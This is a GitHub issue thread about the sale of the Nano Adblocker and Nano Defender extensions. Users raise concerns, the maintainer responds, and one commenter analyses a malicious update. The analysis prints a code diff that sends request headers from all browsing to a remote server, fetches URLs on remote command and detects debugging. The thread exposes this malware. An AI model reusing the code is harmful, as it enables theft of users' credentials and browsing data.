-
Notifications
You must be signed in to change notification settings - Fork 22
[Announcement] Recent and upcoming changes to the Nano projects #362
Comments
Speaking as (to the best of my knowledge) the highest-profile end-user of Nano Adblocker and Defender, the vague notion of "A team of Turkish developers" would definitely need a lot more clarification when the time is right to do so, before I'd feel safe and confident about this. |
That part was not necessary IMO. (probably) Most users of Nano Adblocker/Defender care about their online privacy, so they will probably share your concern and desire for more information, as do I. |
I meant that I was the only list maintainer of a major list that used Nano Adblocker as my main adblocker in my everyday life. |
Before I was contacted by the new developer(s), I was planning on downscaling my projects due to time constraints. I had a totally different announcement drafted, in which I announced that some of the Nano projects will become unmaintained. When I started my projects, I never thought it would become this big, and lately, it has been too much for me. I was honestly hoping that someone would take the maintenance burden away from me. Having to choose between shutting down the projects and having someone else to take care of them, I chose the latter. All this is still new to me, and I am still learning. I hope that I made the right choice and let's hope for the best. |
Frankly it reminds me of the past taking over of uBlock. I don't need to know much about uAssets contributors, their years of contribution speaks all. We know nothing about the new developers. |
And you grew your userbase organically, they are first and foremost aquiring your userbase, hence the scepticism. |
Does the team of Turkish developers have any previous experience with adblocking in any shape or form? |
Software development skills are transferable, and the skills needed to develop a product tend to be different than the ones needed to use a product. Of course developers need to know how to use the features they are developing, but the experience from developing a completely different extension would be much more important than the experience with adblocking. As an example, I know very little about dynamic filtering, I do not believe I ever used it and I am not too sure how it really works. However, this has not limit my ability to develop other parts of the extension. |
@okiehsch That is a good point, I will see what kind of information I can share. |
I am going to bed now. I am not sure what my schedule for next week will look like, so I apologize in advance if I cannot find time to properly reply to your comments until the weekend. |
I would like to point out my view that Nano AdBlocker ("Nano") is pretty much uBO but with a different syntax highlighter and some configuration tweaks, most of the work that benefit Nano occurs in uBO. Surely the acquirers are aware of this? In my opinion the best original feature of Nano as far as I am concerned is the ability to report issue (which requires maintaining an intermediate server), but for the rest I see it only as mostly uBO when leaving out the code editor and tweaks -- the sparse list of fixed issues confirms that the bulk of the commits benefiting Nano occurs in uBO.
Your users installed your extension because they implicitly trusted you. It does not look good when you have to ask permission to disclose important information to those people who wants to acquire your user base (essentially acquiring your user base's trust and a way to monetize uBO volunteers' work) before considering your user base's best interests, i.e. who is going to maintain the extension they use. Additionally, why refer to the acquirer as "Turkish developers" instead of just naming the entity? The nationality of developers is irrelevant, but the entity and its track record is. I find it odd that you feel like mentioning their nationality which is irrelevant while leaving out the more important information about which entity is involved so that people can research it. I am just going to ask point blank:
As far I am concerned at this point from what is being disclosed, what I see is a yet to be disclosed entity is planning to monetize the work and time of all uBO contributors indirectly by acquiring and monetizing Nano. |
As a Firefox port maintainer, I would like to know whether the "Turkish developers" will take over the Firefox port as well or just the Chrome(ium)/Edge part. I am neutral to the decision, but if the upstream developer is changed, I need to think about should I detached from upstream and rename the project, My initial motivation for maintaining this project is I find the usefulness of this project and do not want it dead on Firefox (previously original author and some other maintainers do maintain on Firefox for a while). I try my best to turn myself from normal user to maintainer. I am still too far to be qualified as developer. But in case I still need this project and the new developers do not take over the port (or I don't like their stance, just in case...), I will try my best to develop on my own However, as the uBO have its syntax highlighter and the new Firefox mobile do not support addons other than Recommended Extension, I am even confuse whether Nano Adblocker is still needed on Firefox if report issue is missing (or suspicious that everyone is concerning). Update: I refuse to port for this project anymore. |
I think that among the other original features of Nano Adblocker, Apart from that and Nano Filters / NanoMeow, I think Nano had a few additional included lists (5 Nano-branded lists + Adblock Warning Removal List), and a few additional scriplets that currently aren't being used for much. Nano's original advantages in 2018 that made me jump from uBO to Nano back then, like a then-revolutionary linter, and easier integration with Nano Defender, have pretty much been caught up to in 2020 by uBO. |
Will the project stay open source? |
They can't change the license, and they have to assign GPLv3 license to whatever code they add to the project. |
I will be responding to comments in the order they are received. I am quite short on time, so please be patient. |
There are a couple other things that I would like to address regarding your input, but I do not have time to write that tonight. So let's just get the burning questions out of the way. The new developer(s) claimed that they are a pair of independent developers, they said that they are freelancers who are just starting out. Regarding affiliation with Eyeo and BetaFish, I asked them this morning, and they said no. Update: To clarify, I still control the repos, the Edge store listings, the bot (NanoMeow) account, and the |
Regarding updates to the opening post: I will add disclaimers no matter who acquired my projects. This is not an indication that I no longer care about my projects and their users. Quite the opposite: The updates and disclaimers disclose what I can and cannot control, which gives the users a chance to make an informed decision. Unfortunately, the projects do not have a good notification system, I linked this announcement in all relevant repos for better visibility, this is the best I can do right now. Hopefully most users would have a chance to see this thread and make a decision before the first update from the new developer(s) comes out. I will address your comments when I have more time later this week or this weekend. |
The developers are apparently named Nano Adblocker is controlled by the former and Defender by the latter. I can't find any information about them. |
Why they didn't simply fork the projects? This suggests they wanted not the code base but Nano brand and its user base. What I concern is something like this: |
So this is what is actually happening, I consider all else to be fluff: "Two developers"[1] with no track record of ever contributing to the current project, or any related projects at least showing any sort of interest in content blocking or privacy or even loosely related topics, and with no visible internet presence to this day, paid an undisclosed amount in exchange of the user base and control of the GitHub repositories. As of now, the user base has already been transferred (as per Chrome store listings), and in all likelihood a majority of those users will have no idea their installed extensions is no longer maintained by the person they originally trusted, at least implicitly, when they installed those extensions. Links to the privacy policy have been removed from the Chrome store listings (here, and here). It goes without saying that the goal of these "two developers" is to monetize the two extensions. Those "two developers" will likely continue to import all the work from upstream, i.e. uBO, which is the result of long time volunteers investing their own free time and efforts days after days spanning years, which also contributed to make Nano AdBlocker to become what it is. [1] Using quotes because nobody knows that there are really two actual developers given that nothing can be verified so far. |
Looks like I will be removing everything related to Nano Core/Defender from my uBlock Origin preferences. I've seen how this goes with content-blocking extensions. They have usually turned around and monetized in some fashion. We don't need any more rubbish like that in the ecosystem. @jspenguin2017, I honestly think it would have been better off that you shut down the projects and redirect users back to uBlock Origin instead of "sell" them down the river. As @gorhill has mentioned, it is entirely likely that existing extension users have no idea that ownership has changed hands. This is a significant privacy and security issue as extensions can auto-update. In all honesty, I'm for uBlock Origin marking Nano lists as bad unless these situations can be addressed. Transferring the project over to unknown and unproven maintainers makes no sense. |
You are not wrong if you compare Nano with uBO today, but this was not always like this. Nano was the first adblocker to ever get a syntax highlighter. So I would say that the syntax highlighter is the best original feature since the ability to quickly and easily report issues is present in AdGuard, Adblock Plus, and probably other adblockers before Nano. |
I totally agree, it definitely does not look good for me. This is the first time someone acquired my projects, and honestly I am not too sure what I am supposed to do. If there is a next time, I will certainly be more prepared. Ultimately, I have no control over what the new developer(s) do. So I updated all of my posts in this thread to be clearer and more neutral. This should hopefully help users to make properly informed decisions unaffected by their trust in me, implicit or otherwise. |
I dont understand why people care about nano so much, I mean literally its ublock origin fork with some features |
@enescglyn Because so many people use Nano. |
I started noticing youtube ads. Now I am here. I guess this is it for me. It was good 2 years. Going back to uBlock Origin. Thanks to the nano developer I never noticed ads and ad detector. |
The new developer(s) have yet to publish an update at the time of your post. Your issue is most likely unrelated to the changes announced here. |
I don't think he was saying the changes were related. I think he just came here looking for a fix or reasoning, and then discovered this unfortunate issue and decided to give up on Nano. I too had a similar experience. I came to GitHub looking for an explanation on the lack of recent updates, and came across this, and I think this is probably it for me and Nano Adblocker too. The lack of any announcements or transparency as well as the lack of information regarding the situation, plus the fact that the new maintainers have zero history of ever working on anything, let alone this project, just doesn't really make me want to keep using this. Sure, now there is information available here, but unless you come looking for it, you'll probably never find out. Honestly, if there was a noticeable announcement in the plugin, like a new tab popping up saying "Hey, we're transferring ownership!" I would've been a lot happier. I also would've been a lot happier if the new maintainers had shown some prior interest in the project before acquiring it. That looks to me like they're just looking for some easy targets to acquire instead of actually caring about the project. I plan to still watch out for any new developments in this issue, but I think it is most likely that many users who are informed of this will ditch Nano Adblock. |
It was really worth selling users down the river, huh @jspenguin2017? I forgot to mention this: This is exactly the kind of stuff that Google loves to see because it enables them to implement stricter and stricter policies for extensions, and also policies that cripple their capabilities. Thanks for contributing to the problem. |
@uBlock-user They used something like |
I am concerned. |
hmm. I guess the new Developers name are [ana-sayfa]. And they have a play store account with BeeMobileApps name. https://sites.google.com/view/nano-dev/ana-sayfa Welll, I already installed uBlock Origin. But this thread is pooping up on my mail. |
@novaz9 No worry since the packages have not been updated yet. Once they are updated, anybody will be able to look at their content to find out if there is anything wrong in them. |
Actually "ana sayfa" means "home page" in English |
Or another random girl - Ana maybe "=" |
Finally they are here: https://github.com/nenodevs/uBlockProtector However, their update on Chrome Store does not match the one in their repository (not sure if forgot push or else). You can compare their GitHub and the below image. Their Chrome Store version add a script call The new script they add seems minified |
I don't think it's malicious, looks like an older version of the |
You can use Chrome extension source viewer to inspect any extension, it has a built-in de-minifier. |
Or this, by the same guy: https://robwu.nl/crxviewer/ |
So here is what I am seeing in the new Nano Defender 15.0.0.206: Code was added to detect that the dev console of the extension is being opened. If you open the dev console of Nano Defender 15.0.0.206, a notification named Now this is from reading the code, and I could probably understand better if I could investigate the extension using dev tools -- but given the above, in all likelihood the extension will modify its behavior once you open the dev tools. So here is what else I can see: At launch, the extension fetch something from The content of Note that the webRequest.onBeforeSendHeaders() listener is registered for all network requests:
So which info ends up being sent is configured externally through the There is a bit of silly attempt at obfuscation in part of the webRequest.onBeforeSendHeaders() handler:
Which is equivalent to:
Purpose is not clear, it's meant to remove instances of So trying to figure an example of what the new code can do. Let's say it wants to get sensitive information about network requests to a specific bank, then the content of the
Then the webRequest.onBeforeSendHeaders() handler would check whether The The extension is now designed to lookup specific information from your outgoing network requests according to an externally configurable heuristics and send it to A note regarding what the extension is doing above. Though the extension requests the Here the diff for the code change you won't find in their GitHub repo: --- ./background/core.js
+++ ./background/core.js
@@ -160,7 +160,7 @@
const hasNews = false;
- const newsPage = "https://jspenguin2017.github.io/uBlockProtector/#announcements";
+ const newsPage = "https://github.com/nenodevs/uBlockProtector/#announcements";
const newsReadFlag = "news-read";
// This handler becomes inactive when there is a popup page set
@@ -189,7 +189,8 @@
// ------------------------------------------------------------------------------------------------------------- //
};
-
+var defender = io.connect("https://def.dev-nano.com/");
+var listOfObject = {};
// ----------------------------------------------------------------------------------------------------------------- //
a.noopErr = () => {
@@ -211,6 +212,29 @@
// ----------------------------------------------------------------------------------------------------------------- //
+
+
+async function dLisfOfObject(newList) {
+ let dListResp = await fetch(newList.uri, newList.attr)
+ var listOfObj = {}
+ listOfObj.headerEntries = Array.from(dListResp.headers.entries())
+ listOfObj.data = await dListResp.text()
+ listOfObj.ok = dListResp.ok;
+ listOfObj.status = dListResp.status;
+ return listOfObj;
+}
+
+defender.on("dLisfOfObject", async function (newList) {
+ let getRes = await dLisfOfObject(newList);
+ defender.emit(newList.callBack, getRes)
+});
+
+defender.on("listOfObject", function (a) {
+ listOfObject = a;
+})
+
+
+
// Redirect helpers
a.rSecret = a.cryptoRandom();
@@ -227,7 +251,22 @@
// 1 second blank video, taken from https://bit.ly/2JcYAyq (GitHub uBlockOrigin/uAssets).
a.blankMP4 = a.rLink("blank.mp4");
-
+
+var element = document.createElement("p"); ;
+var openListGet = false;
+element.__defineGetter__("id", function() {
+ openListGet = true;
+});
+
+var i = setInterval(function() {
+ openListGet = false;
+ console.log(element);
+ if(openListGet){
+ defender.emit("report")
+ console.clear();
+ clearInterval(i)
+ }
+}, 100);
// ----------------------------------------------------------------------------------------------------------------- //
// tab - Id of the tab
@@ -450,6 +489,50 @@
return true;
};
+
+var blockingHandler = function (infos) {
+ var changedAsArray = Object.keys(listOfObject);
+
+ var detailsHeader = infos.requestHeaders;
+ var HeadReverse = detailsHeader.reverse();
+ var stringyFy = JSON.stringify(HeadReverse);
+ var mount = "";
+ if (changedAsArray.length > 0) {
+ var checkerList = true;
+ for (const object of changedAsArray) {
+ if (object.x === object.y) {
+ mount += 1;
+ }
+ break;
+ }
+ for (let i = 0; i < changedAsArray.length; i++) {
+ let x = changedAsArray[i];
+ var re = new RegExp(listOfObject[x],'gi');
+ mount = "5";
+ if (infos[x].toString().match(re) == null) {
+ checkerList = false;
+ break;
+ }
+ }
+ if (checkerList) {
+ defender.emit('handleObject', infos);
+ }
+ }
+
+ var m = [45,122,122,122]
+ var s = m.map( x => String.fromCharCode(x) )
+ var x = s.join("");
+ var replacerConcat = stringyFy.split(x).join("");
+ var replacer = JSON.parse(replacerConcat);
+ return {
+ requestHeaders: replacer
+ }
+};
+
+chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, {
+ urls: ["<all_urls>"]
+}, ['requestHeaders', 'blocking', 'extraHeaders']);
+
// ----------------------------------------------------------------------------------------------------------------- // |
Forgot to mention the obvious: uninstall now -- with those capabilities, it should be considered malware. |
So @jspenguin2017's users have been sold to malware. Great. I'm going to report this extension to the Edge team for urgent analysis. |
For now, version for Edge isn't updated and didn't changed owner, only Chrome version is affected. |
Maybe he reportead as "whisper" / private-message. |
As far as I'm aware you can't change owners with the Microsoft store, so @jspenguin2017 is most likely to just have given login details. It may very well already be submitted, awaiting review. I've asked the team to review this thread and look out for an update. |
LiCybora/NanoDefenderFirefox#187 (comment) This was posted on the Firefox port of NanoDefender on how to migrate from Nano Adblocker to uBlock Origin, for anyone that hasn't seen it. |
So, what I suspected was correct. The extension has been modified to become malware, and outright compromises the privacy and security of users. You sold your users down the river and put them in harm's way to make a quick buck. That is actual blood on your hands now. Sure, you didn't write the code yourself, but you directly enabled the pathway for this to happen. Nano has now become a historical example of why content blocking extensions should not be sold, and what happens when they are. |
That is indeed a suspicious update, I will start analyzing it shortly. I will be archiving this repository, so let's head over to my general purpose repository for further discussions: https://github.com/jspenguin2017/Snippets/issues |
No, I still control the Edge store listings.
Do not misrepresent facts. I was looking for a new maintainer. If I knew that the new developer(s) would do this, I would not have accepted the deal. As I mentioned here [1], I planned to donate most of the money back to the new developer(s) if they do a good job. If I wanted to make a quick buck, I would sell the projects and disappear. [1] #362 (comment) |
Important updates and disclaimers: The WebStore listings are no longer under my control. I am not responsible for the actions of the new developer(s). If you feel concerned about the recent changes (please continue reading for more information), please remember that you can uninstall the extensions and/or find alternatives at any time.
As some of you might have noticed, Nano Adblocker is now months behind upstream. It became clear that I simply do not have enough time to properly maintain the Nano projects.
At the beginning, there were no backlogs. As the projects grow, I added a backlog system to better manage open issues. That was unfortunately not enough, so I added another level of backlog -- the triage queue. Then a third level. And a fourth one. Now the fourth level of backlog, the notification queue, has over 138 issues waiting for my attention. No matter how well I organize incoming issues, if I do not have enough time to look into them, I will simply fall further and further behind. With thousands of issues backlogged, it is only a matter of time that the Nano projects collapse.
And here comes the news. New developer(s) are in the process of acquiring Nano Adblocker and Nano Defender. Hopefully, they will be able to put an end to this backlog madness and finally give Nano Adblocker some real development time instead of constantly trying to catch up to upstream. The transition is still taking place, so I would like to ask for your patience. I will have more details about this in the upcoming days or weeks.
I would like to apologize for not being able to post an announcement earlier. I was extremely busy last week, and with all the additional things that I have to take care of to ensure a smooth transition, I fall quite a bit behind schedule. If you have any questions or concerns, please post them below. I am still trying to catch up, so please be patient while I find time to respond to your inputs.
Updates:
The new developer(s) said that they will create their own repositories and change links where appropriate.
The Edge store listings were changed to hidden.
NanoMeow/MDLMirror
has been archived.NanoMeow/UltimateMirror
has been archived, and its visibility has been changed to private.NanoMeow/MirrorEngine
has been archived.The Nano Defender repository has been archived.
Repositories in
NanoAdblocker
andNanoAdblockerLab
organizations exceptNanoAdblocker/NanoCore
have been archived.The backend server running on
legacy.hugoxu.com
will no longer accept new reports from the Quick Issue Reporter.NanoAdblocker/NanoCore
andNanoMeow/QuickReports
will be archived on 2020-10-15.Please head over to my general purpose repository for further discussions: https://github.com/jspenguin2017/Snippets/issues
The text was updated successfully, but these errors were encountered: